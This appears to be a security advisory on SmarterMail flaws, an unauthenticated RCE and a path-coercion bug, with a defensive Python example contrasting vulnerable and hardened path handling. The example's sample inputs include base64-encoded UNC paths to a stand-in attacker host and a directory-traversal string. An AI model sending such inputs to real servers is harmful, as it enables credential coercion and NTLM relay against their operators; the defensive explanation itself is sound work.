SmarterMail email software received fixes for an unauthenticated remote code execution vulnerability tracked as CVE-2026-24423. The CVE record on CVE.org rates it CVSS 9.3 and states that it could allow arbitrary code execution. Build 9511, dated January 15, 2026, addresses the issue.
KEY FACTS
- Vulnerability: CVE-2026-24423, unauthenticated RCE in the ConnectToHub API, CVSS 9.3
- Patches: Build 9511, dated January 15, 2026, and Build 9518, dated January 22, 2026
- Additional flaw: CVE-2026-25067, path coercion, CVSS 6.9, which can enable NTLM relay
- Active exploitation: a related critical authentication bypass (CVE-2026-23760) was reported as being exploited in the wild
The ConnectToHub API flaw allows an unauthenticated attacker to point the application at a malicious HTTP host that serves an operating system command, which the application then executes. The result is remote code execution without prior authentication.
Build 9511, dated January 15, 2026, contains the patch for CVE-2026-24423; the same build also addresses another critical authentication bypass, tracked as CVE-2026-23760. Details of the fixes and version notes appear in the SmarterTools release notes.
A separate medium-severity issue, CVE-2026-25067, involves unauthenticated path coercion through a background-of-the-day preview endpoint. The application base64-decodes attacker-supplied input and uses it as a filesystem path without validation. On Windows, a decoded UNC path is resolved over the network, so the server attempts outbound SMB authentication to the host named in the path.
That outbound SMB authentication can be abused for credential coercion, NTLM relay attacks and unauthorized network authentication. The extent of in-the-wild exploitation of CVE-2026-24423 was not specified in the available record.
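The path coercion described above, as an added illustration that is not SmarterMail's code (the product is .NET; Python with ntpath is used here so the Windows path semantics run anywhere). The flawed pattern hands the decoded parameter straight to the file API, so a UNC value reaches the SMB client; the hardened version accepts only a bare file name and confines it to a hypothetical storage directory. BASE_DIR and the sample request parameters are constructed for the example.

```python
import base64
import binascii
import ntpath
from typing import Optional

# Hypothetical storage root for background images; the real directory
# layout of SmarterMail is not described on the page.
BASE_DIR = r"C:\SmarterMail\Backgrounds"


def decode_param(raw: str) -> Optional[str]:
    """Base64-decode a query parameter; None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def is_unc(path: str) -> bool:
    """True if Windows would treat the path as a UNC reference (\\\\host\\share)."""
    return path.startswith("\\\\") or path.startswith("//")


def vulnerable_resolve(raw: str) -> Optional[str]:
    """The flawed pattern: decoded input goes straight to the file API.

    Passing an attacker-supplied UNC path to a file-exists or open call on
    Windows makes the server authenticate to the named host over SMB
    before any "not found" error comes back.
    """
    return decode_param(raw)


def hardened_resolve(raw: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Accept only a bare file name and confine the result to base_dir."""
    name = decode_param(raw)
    if not name or "\x00" in name:
        return None
    # A background name never needs separators, drive letters or UNC
    # prefixes; rejecting these characters removes every UNC spelling
    # (\\host, //host, \\?\UNC\host) and every traversal input at once.
    if any(ch in name for ch in "\\/:") or name in (".", ".."):
        return None
    candidate = ntpath.normpath(ntpath.join(base_dir, name))
    # Defence in depth: confirm the normalised path is still inside base_dir.
    root = ntpath.normcase(base_dir)
    if ntpath.commonpath([ntpath.normcase(candidate), root]) != root:
        return None
    return candidate


def _b64(text: str) -> str:
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


# Constructed request parameters for the example, not captured traffic.
SAMPLE_PARAMS = {
    "benign": _b64("sunset.jpg"),
    "unc_backslash": _b64(r"\\attacker.example\share\bg.png"),
    "unc_forward": _b64("//attacker.example/share/bg.png"),
    "traversal": _b64(r"..\..\Windows\win.ini"),
    "not_base64": "%%%not-base64%%%",
}


if __name__ == "__main__":
    for label, param in SAMPLE_PARAMS.items():
        vuln = vulnerable_resolve(param)
        print(f"{label:14} vulnerable -> {vuln!r:45} UNC={is_unc(vuln or '')}")
        print(f"{'':14} hardened   -> {hardened_resolve(param)!r}")
```

Rejecting separators outright is deliberately stricter than a normalise-then-compare check on its own: the forward-slash and `\\?\` UNC spellings are easy to miss with a prefix check, and a bare file name is all the endpoint needs.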
WHY IT MATTERS
An unauthenticated remote code execution flaw can allow full compromise of affected servers, and a path coercion issue that forces outbound authentication can be used to capture or relay credentials. Administrators should apply the listed builds promptly. Until a server is patched, blocking outbound SMB (TCP 445) from it limits the credential coercion exposure from CVE-2026-25067, but that does nothing against the RCE.